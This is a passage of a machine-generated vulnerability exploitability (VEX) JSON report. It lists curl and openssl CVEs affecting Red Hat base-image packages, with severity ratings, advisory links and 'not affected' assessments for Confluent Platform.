        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/openssl@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2024-7264",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:H"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        125
      ],
      "description": "libcurl's ASN1 parser code has the `GTime2str()` function, used for parsing an\nASN.1 Generalized Time field. If given an syntactically incorrect field, the\nparser might end up using -1 for the length of the *time fraction*, leading to\na `strlen()` getting performed on a pointer to a heap buffer area that is not\n(purposely) null terminated.\n\nThis flaw most likely leads to a crash, but can also lead to heap contents\ngetting returned to the application when\n[CURLINFO_CERTINFO](https://curl.se/libcurl/c/CURLINFO_CERTINFO.html) is used.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2024-7264"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2024/07/31/1"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2025:1671"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2025:1673"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2024-7264"
        },
        {
          "url": "https://bugzilla.redhat.com/2294581"
        },
        {
          "url": "https://bugzilla.redhat.com/2294676"
        },
        {
          "url": "https://bugzilla.redhat.com/2301888"
        },
        {
          "url": "https://bugzilla.redhat.com/2318857"
        },
        {
          "url": "https://bugzilla.redhat.com/2318858"
        },
        {
          "url": "https://bugzilla.redhat.com/2318870"
        },
        {
          "url": "https://bugzilla.redhat.com/2318873"
        },
        {
          "url": "https://bugzilla.redhat.com/2318874"
        },
        {
          "url": "https://bugzilla.redhat.com/2318876"
        },
        {
          "url": "https://bugzilla.redhat.com/2318882"
        },
        {
          "url": "https://bugzilla.redhat.com/2318883"
        },
        {
          "url": "https://bugzilla.redhat.com/2318884"
        },
        {
          "url": "https://bugzilla.redhat.com/2318885"
        },
        {
          "url": "https://bugzilla.redhat.com/2318886"
        },
        {
          "url": "https://bugzilla.redhat.com/2318897"
        },
        {
          "url": "https://bugzilla.redhat.com/2318900"
        },
        {
          "url": "https://bugzilla.redhat.com/2318905"
        },
        {
          "url": "https://bugzilla.redhat.com/2318914"
        },
        {
          "url": "https://bugzilla.redhat.com/2318922"
        },
        {
          "url": "https://bugzilla.redhat.com/2318923"
        },
        {
          "url": "https://bugzilla.redhat.com/2318925"
        },
        {
          "url": "https://bugzilla.redhat.com/2318926"
        },
        {
          "url": "https://bugzilla.redhat.com/2318927"
        },
        {
          "url": "https://bugzilla.redhat.com/2331191"
        },
        {
          "url": "https://bugzilla.redhat.com/2339218"
        },
        {
          "url": "https://bugzilla.redhat.com/2339220"
        },
        {
          "url": "https://bugzilla.redhat.com/2339221"
        },
        {
          "url": "https://bugzilla.redhat.com/2339226"
        },
        {
          "url": "https://bugzilla.redhat.com/2339231"
        },
        {
          "url": "https://bugzilla.redhat.com/2339236"
        },
        {
          "url": "https://bugzilla.redhat.com/2339238"
        },
        {
          "url": "https://bugzilla.redhat.com/2339243"
        },
        {
          "url": "https://bugzilla.redhat.com/2339247"
        },
        {
          "url": "https://bugzilla.redhat.com/2339252"
        },
        {
          "url": "https://bugzilla.redhat.com/2339259"
        },
        {
          "url": "https://bugzilla.redhat.com/2339266"
        },
        {
          "url": "https://bugzilla.redhat.com/2339270"
        },
        {
          "url": "https://bugzilla.redhat.com/2339271"
        },
        {
          "url": "https://bugzilla.redhat.com/2339275"
        },
        {
          "url": "https://bugzilla.redhat.com/2339277"
        },
        {
          "url": "https://bugzilla.redhat.com/2339281"
        },
        {
          "url": "https://bugzilla.redhat.com/2339284"
        },
        {
          "url": "https://bugzilla.redhat.com/2339291"
        },
        {
          "url": "https://bugzilla.redhat.com/2339293"
        },
        {
          "url": "https://bugzilla.redhat.com/2339295"
        },
        {
          "url": "https://bugzilla.redhat.com/2339299"
        },
        {
          "url": "https://bugzilla.redhat.com/2339300"
        },
        {
          "url": "https://bugzilla.redhat.com/2339304"
        },
        {
          "url": "https://bugzilla.redhat.com/2339305"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2294581"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2294676"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2301888"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318857"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318858"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318870"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318873"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318874"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318876"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318882"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318883"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318884"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318885"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318886"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318897"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318900"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318905"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318914"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318922"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318923"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318925"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318926"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318927"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2331191"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339218"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339220"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339221"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339226"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339231"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339236"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339238"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339243"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339247"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339252"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339259"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339266"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339270"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339271"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339275"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339277"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339281"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339284"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339291"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339293"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339295"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339299"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339300"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339304"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339305"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://curl.se/docs/CVE-2024-7264.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2024-7264.json"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-11053"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21193"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21194"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21196"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21197"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21198"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21199"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21201"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21203"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21212"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21213"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21218"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21219"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21230"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21231"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21236"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21237"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21238"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21239"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21241"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21247"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-37371"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-5535"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-7264"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21490"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21491"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21494"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21497"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21500"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21501"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21503"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21504"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21505"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21518"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21519"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21520"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21521"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21522"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21523"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21525"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21529"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21531"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21534"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21536"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21540"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21543"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21546"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21555"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21559"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2025-1671.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2025:1673"
        },
        {
          "url": "https://github.com/curl/curl/commit/27959ecce75cdb2809c0bdb3286e60e08fadb519"
        },
        {
          "url": "https://hackerone.com/reports/2629968"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2024-7264.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2025-1673.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-7264"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20240828-0008/"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20241025-0006/"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20241025-0010/"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-6944-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-6944-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2024-7264"
        },
        {
          "url": "https://www.oracle.com/security-alerts/cpuoct2024.html#AppendixMSQL"
        }
      ],
      "published": "2024-07-31T08:15:02+00:00",
      "updated": "2026-06-17T08:19:43+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2024-9681",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:L"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:L"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        697
      ],
      "description": "When curl is asked to use HSTS, the expiry time for a subdomain might\noverwrite a parent domain's cache entry, making it end sooner or later than\notherwise intended.\n\nThis affects curl using applications that enable HSTS and use URLs with the\ninsecure `HTTP://` scheme and perform transfers with hosts like\n`x.example.com` as well as `example.com` where the first host is a subdomain\nof the second host.\n\n(The HSTS cache either needs to have been populated manually or there needs to\nhave been previous HTTPS accesses done as the cache needs to have entries for\nthe domains involved to trigger this problem.)\n\nWhen `x.example.com` responds with `Strict-Transport-Security:` headers, this\nbug can make the subdomain's expiry timeout *bleed over* and get set for the\nparent domain `example.com` in curl's HSTS cache.\n\nThe result of a triggered bug is that HTTP accesses to `example.com` get\nconverted to HTTPS for a different period of time than what was asked for by\nthe origin server. If `example.com` for example stops supporting HTTPS at its\nexpiry time, curl might then fail to access `http://example.com` until the\n(wrongly set) timeout expires. This bug can also expire the parent's entry\n*earlier*, thus making curl inadvertently switch back to insecure HTTP earlier\nthan otherwise intended.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2024-9681"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2025/Apr/10"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2025/Apr/11"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2025/Apr/12"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2025/Apr/13"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2025/Apr/4"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2025/Apr/5"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2025/Apr/8"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2025/Apr/9"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2024/11/06/2"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2024-9681"
        },
        {
          "url": "https://curl.se/docs/CVE-2024-9681.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2024-9681.json"
        },
        {
          "url": "https://github.com/advisories/GHSA-g337-g667-mjvw"
        },
        {
          "url": "https://hackerone.com/reports/2764830"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-9681"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20241213-0006"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20241213-0006/"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7104-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2024-9681"
        }
      ],
      "published": "2024-11-06T08:15:03+00:00",
      "updated": "2026-06-17T08:25:03+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
